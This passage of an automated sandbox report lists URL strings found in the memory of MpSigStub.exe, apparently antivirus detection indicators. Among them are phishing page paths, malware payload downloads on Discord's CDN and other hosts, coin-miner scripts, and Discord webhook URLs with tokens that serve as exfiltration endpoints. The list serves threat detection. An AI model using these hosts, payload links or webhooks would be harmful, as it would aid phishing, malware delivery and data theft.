Source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp String found in binary or memory: https://api.tdameritrade.com/v1/accounts
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://app.box.com/s/q5bvxbs72948q6t7n5nrft0lnuddkj7g
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://appengine.google.com/_ah/logout?continue=http
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://apps-newsorders.servehttp.com/_
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://apps-nosmile.servehttp.com/_
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: https://appupdate.herokuapp.com
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://archaeology.ideaschema.com/hiwork.php
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://armybar.hopto.org/remoteload.dotm
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: https://userkade.com/21.psd
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: https://asushotfix.com/.
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: https://atacamaplotter.cl/wp-includes/fonts/reportpdfnew.php
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: https://ate.bz/now.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://attack.mitre.org
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: https://auth-server4.xyz/processor.php
Source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp String found in binary or memory: https://auth.tdameritrade.com/auth?response_type=code&redirect_uri=
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://authedmine.com/lib/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://autobusinessfunnel.com/wp-admin/css/colors/
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://avart.org/hdhdhk/xls/index.php?
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://azur.melhordev.com/.well-known/acme-challenge/std/php/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://b.top4top.io/p_15665ejq60.jpg
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://bankline.itau.com.br/
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: https://bankline.itau.com.br/GRIPNET/bklcgi.exe
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://bankss-71.ml/2.dll
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: https://batc.dyndns.dk/minto3/next.php
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://bb.realestateprivateportfolio.com/img/
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: https://bbcgroup.co.in/qpipsriug.php
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: https://beetibutron.xyz/rowdy/brand.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://behendige-boxers.nl/ds/0902.gif
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://benabase.com/cgi_bin/amvzdxmuc3vhcmv6qhzvbg90zweuy29t
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: https://benchlings.com/
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: https://benchlings.com/xoxo/next.php
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://berlitzalahsa.sa/sport/rockstar.php
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: https://besthybridcar.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://bigup.marketing/wp-content/plugins/seo_index/hloym4kndci.php
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: https://bipblocker.com/get_config/
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/3kthd4j
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://bit.ly/3kvdcmi
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/kimrakfl33/git/raw/master/kinsingchmod
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://bk.kv-dv8.club/?e=bbeckler
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://bm.jb-voice.online/?e=accounting
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://bribble.com/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: https://burnleyd.cf/brand.php
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://butikzai.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://bydinvestments.com/cache/rainer/258720/rainer&#46;bauer
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://c-0li.club/?e=JPohlman
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: https://cablenet.com.ec/drms/bb.html
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp String found in binary or memory: https://calfeutragebprs%.com/wp%-content/image/s3%.php
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: https://camillesanz.com/lib/status.js
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://carpascapital.com/gbpg8mtsgbv/ka.html
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://casciscus.com/wp-admin/v4/
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://casciscus.com/wp-admin/v4/pocket.php
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://cazala.github.io/coin-hive-proxy/client.js?
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://cctraff.ru/
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: https://cdn-105.anonfiles.com/
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18307613737.0000021B5E0EE000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/844726578415665236/846209246264688650/
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/869326380259758080/VodoKanalForms.dll
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/859130004898447360/871143663751823370/Anasayfa.dll
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/876742387932745741/876743456536559656/steammaa.dll
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dll
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dllx
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://cdshgvjs.ygto.com/leo/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://ceibosnorte.com/images/clients/01/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://chiddingstonenursery.co.uk/loign.php?user=
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: https://childrenplacebd.com/childrendc/
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: https://childrenplacebd.com/childrendc/polo.php
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://chinatyres.net/IuNbOpen/oiUnbYATR.php
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: https://chogoon.com/srt/d7q0j
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: https://chpingnow.xyz/21.psd
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://clashwoman.info/
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://cnaaa11sd.gb.net/efcdsvftgxc/?gdes3sc=6sdfr45
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: https://co3.live
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/a5oly
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/az2yl
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/epnq7
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://coki.me/xmwds
Source: MpSigStub.exe, 0000000B.00000003.18265076735.0000021B4BD14000.00000004.00000001.sdmp String found in binary or memory: https://configdl.teamviewer.com/configs
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://connect.statetechlink.xyz/?e=
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://connectoutlook.email/main.php
Source: MpSigStub.exe, 0000000B.00000003.18276905837.0000021B5FDE8000.00000004.00000001.sdmp String found in binary or memory: https://content.dropboxapi.com/2/files/upload
Source: MpSigStub.exe, 0000000B.00000003.18276905837.0000021B5FDE8000.00000004.00000001.sdmp String found in binary or memory: https://content.dropboxapi.com/2/files/uploadxA
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp String found in binary or memory: https://contirecovery.best
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: https://corazonarquitectura.com/94reej6f3mr/lipa.html
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://courieroffice.net/wp-admin/whatsapp1.php
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: https://courieroffice.net/wp-content/post2.php
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: https://crashpad.chromium.org/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: https://crashpad.chromium.org/x
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://creativechigz.co.zw/themes/newexceltoosab.php
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode.txt
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: https://crypto-loot.com/lib/miner.min.js
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://cut.ly/a2wiit8
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://cut.ly/nctboib
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://cutt.ly/nbcoprl
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.certkeys?rev=HEAD
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: https://d.lqw.me/xuiow/
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: https://d.symcb.com/rpa0)
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: https://dahamarli.xyz
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://darmatic.co.rs/ds/1502.gif
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://dashboard.imadeit.com.ng/ds/151120.gif
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://dawnamae.000webhostapp.com/exel.phpmethod=
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: https://de.gsearch.com.de/api/update.sh
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://debatestage.com/wp-admin/css/colors/blue/reportmaersk.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://dev-thegentlemans.teoria.agency/owa/next.php
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: https://devcellsegovapiwebapp.azurewebsites.net/
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://diarnondfireplace.com/dobo/xxx.php?user=
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://dichthuatsnu.com/goodweb/pwofiles.php
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: https://diplomaticroll.com/
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/770716126988599316/o7GXYebuPQzx7RQFUD4cTOPMq2gGicypOMyNpFVQsIb9qyVW
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/850115118066040833/lcFHGcD2eUjv1zEJO_Ped6EAVU7W44L8X3chfyx9YoIb7YBS
Source: MpSigStub.exe, 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/api/webhooks/x
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://discordapp.com/api/webhooks/757994001767989269/f3KGimlvr5nZDHyIVt3GF4iEkqvy-je8zsM6MPhPc54x0
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: https://divelpid.my/wp-content/themes/monolit/woocommerce/global/aaie6jbhso9.php
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: https://divineleverage.org/de.php
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: https://dlya-detey.site/emz/reportdhlnew2.php
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://docs-eight-sable.vercel.app/
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/document/d/e/2pacx-1vtrc0l1v7hke7ebcnmumoqomoajhb5togg63zkisb68sj3z7lcmv9ndk
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/feeds/default/private/full?v=3
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: https://drp.su/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: https://dumpster-server.herokuapp.com/manager/query
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: https://dynafivecon.com/ds/26.gif
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: https://ecosym.cl/firmas/wp-error.php
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: https://efishedo.info/?tag_id
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: https://eletrocoghi.com.br/drms/fert.html
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: https://emvoips.eononass.xyz/?e=%25
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://en.czonediver.com/ds/0502.gif
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: https://erythrocyte-gaskets.000webhostapp.com/ms/excelz/excelz/index.php?email=
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://expressen.se/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: https://extranet.carlsonwagonlit.com/gdsscripts/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://extraosseous.com/zik/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: https://faog.org.hk/scanner/overwatch.php
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: https://fazalandsons.com.pk/wp-includes/ixr/class-ixr-base64.php
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: https://ferra.xyz/glsdil.php
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://fersite24.xyz/sa2234332324if3g4f23.php
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: https://filedropper.com/main/
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: https://fileshare24.top/3223if3g4f23.php
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/converter.dot
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: https://flopyrhnd.tk/pr/lan.php
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: https://flyaircario.com/i/post.php
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: https://folkloreeconomy.com/next.php
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://formspree.io/f/
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: https://fpvtunes.binaryprotectors.com/msreal/jreside
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/gclxo6
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/j7xs8j
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://fr-an1.link/?e=atloperat
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://freelanceranik.com/group.php
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: https://friendoffishing.com//wp-content/themes/calliope/template-parts/wp_data.php
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: https://fslqzt.info/
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=accounts
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=info
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=m.turqueto
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://geoconsultantservices.com/some/next.php
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://gettraff.ru/
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: https://gettraff.ru/aws?keyword=
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: https://gez.org.zw/errorpages/load/
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: https://ggtraff.ru/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: https://gidbasket.com/drms/ind.html
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: https://gist.githubusercontent.com/razdorhere
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/512295
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/68070804
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: https://github.com/
Source: mpam-728dfe11.exe, 00000011.00000003.18617240390.0000027770025000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Azure/azure-storage-cpp)
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Bendr0id/xmrigCC
Source: mpam-728dfe11.exe, 00000011.00000003.18617240390.0000027770025000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Microsoft/cpprestsdk)
